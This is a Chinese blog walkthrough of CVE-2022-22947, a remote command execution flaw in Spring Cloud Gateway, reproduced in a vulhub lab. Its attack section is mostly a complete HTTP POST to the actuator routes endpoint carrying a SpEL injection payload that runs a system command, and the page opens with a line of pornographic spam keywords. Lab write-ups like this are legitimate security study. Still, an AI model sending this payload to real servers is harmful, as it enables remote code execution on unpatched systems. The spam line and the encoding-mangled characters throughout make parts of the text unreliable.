亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

Spring?Cloud?Gateway遠程命令執(zhí)行漏洞分析(CVE-2022-22947)

 更新時間:2023年03月16日 14:11:33   作者:Big&Bird  
使用Spring Cloud Gateway的應用程序在Actuator端點啟用、公開和不安全的情況下容易受到代碼注入的攻擊,攻擊者可以惡意創(chuàng)建允許在遠程主機上執(zhí)行任意遠程執(zhí)行的請求,這篇文章主要介紹了Spring?Cloud?Gateway遠程命令執(zhí)行漏洞(CVE-2022-22947),需要的朋友可以參考下

聲明:本文僅供學習參考,其中涉及的一切資源均來源于網絡,請勿用于任何非法行為,否則您將自行承擔相應后果,本人不承擔任何法律及連帶責任。

漏洞描述

使用Spring Cloud Gateway的應用程序在Actuator端點啟用、公開和不安全的情況下容易受到代碼注入的攻擊。攻擊者可以惡意創(chuàng)建允許在遠程主機上執(zhí)行任意遠程執(zhí)行的請求。

當攻擊者可以訪問actuator API時,就可以利用該漏洞執(zhí)行任意命令。

影響范圍

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本

環(huán)境搭建

漏洞環(huán)境搭建,采用vulhub,搭建方法,自行搜索。

搭建成功后,訪問一下

漏洞復現(xiàn)

1.查看actuator端點是開啟的

抓包,并修改接口為/actuator

2. 查看/actuator/gateway/routes

返回的路由信息,意思是當訪問index時,路由到http://example.com:80

3.創(chuàng)建路由

POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.10.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 431

{
    "id": "test",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "cmd"
            }
        }
    ],
    "uri": "http://example.com:80",
    "order": 0
}

4.刷新路由

5.訪問創(chuàng)建的路由

6.刪除路由

7.再次刷新路由

8.然后,訪問該路由,發(fā)現(xiàn)路由已被刪除

到此這篇關于Spring Cloud Gateway遠程命令執(zhí)行漏洞(CVE-2022-22947)的文章就介紹到這了,更多相關Spring Cloud Gateway遠程命令執(zhí)行漏洞內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

相關文章

  • JAVA實現(xiàn)生成短鏈接的示例代碼

    JAVA實現(xiàn)生成短鏈接的示例代碼

    短鏈接就是將長度較長的鏈接壓縮成較短的鏈接,本文就來介紹一下JAVA實現(xiàn)生成短鏈接的示例代碼,具有一定的參考價值,感興趣的可以了解一下
    2023-08-08
  • 深入解析Java的設計模式編程中建造者模式的運用

    深入解析Java的設計模式編程中建造者模式的運用

    這篇文章主要介紹了深入解析Java的設計模式編程中建造者模式的運用,同時文中也介紹了建造者模式與工廠模式的區(qū)別,需要的朋友可以參考下
    2016-02-02
  • Java 根據(jù)網絡URL獲取該網頁上面所有的img標簽并下載圖片

    Java 根據(jù)網絡URL獲取該網頁上面所有的img標簽并下載圖片

    這篇文章主要介紹了Java 根據(jù)網絡URL獲取該網頁上面所有的img標簽并下載圖片,幫助大家更好的理解和使用Java,感興趣的朋友可以了解下
    2020-11-11
  • idea自定義快捷代碼生成模板的方法

    idea自定義快捷代碼生成模板的方法

    這篇文章主要介紹了idea自定義快捷代碼生成模板的方法,本文通過圖文并茂的形式給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友可以參考下
    2020-12-12
  • java策略枚舉:消除在項目里大批量使用if-else的優(yōu)雅姿勢

    java策略枚舉:消除在項目里大批量使用if-else的優(yōu)雅姿勢

    這篇文章主要給大家介紹了關于Java徹底消滅if-else的8種方案,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習吧
    2021-06-06
  • mybatisplus之使用@Select解讀

    mybatisplus之使用@Select解讀

    這篇文章主要介紹了mybatisplus之使用@Select解讀,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2023-07-07
  • Java中自己如何實現(xiàn)log2(N)

    Java中自己如何實現(xiàn)log2(N)

    這篇文章主要介紹了Java中自己實現(xiàn)log2(N)的方法,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2021-08-08
  • Java日常練習題,每天進步一點點(11)

    Java日常練習題,每天進步一點點(11)

    下面小編就為大家?guī)硪黄狫ava基礎的幾道練習題(分享)。小編覺得挺不錯的,現(xiàn)在就分享給大家,也給大家做個參考。一起跟隨小編過來看看吧,希望可以幫到你
    2021-07-07
  • springboot集成nacos讀取nacos配置數(shù)據(jù)的原理

    springboot集成nacos讀取nacos配置數(shù)據(jù)的原理

    這篇文章主要介紹了springboot集成nacos讀取nacos配置數(shù)據(jù)的原理,文中有詳細的代碼流程,對大家學習springboot集成nacos有一定的幫助,需要的朋友可以參考下
    2023-05-05
  • 簡單了解JavaBean作用及常用操作

    簡單了解JavaBean作用及常用操作

    這篇文章主要介紹了簡單了解JavaBean作用及常用操作,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下
    2020-05-05

最新評論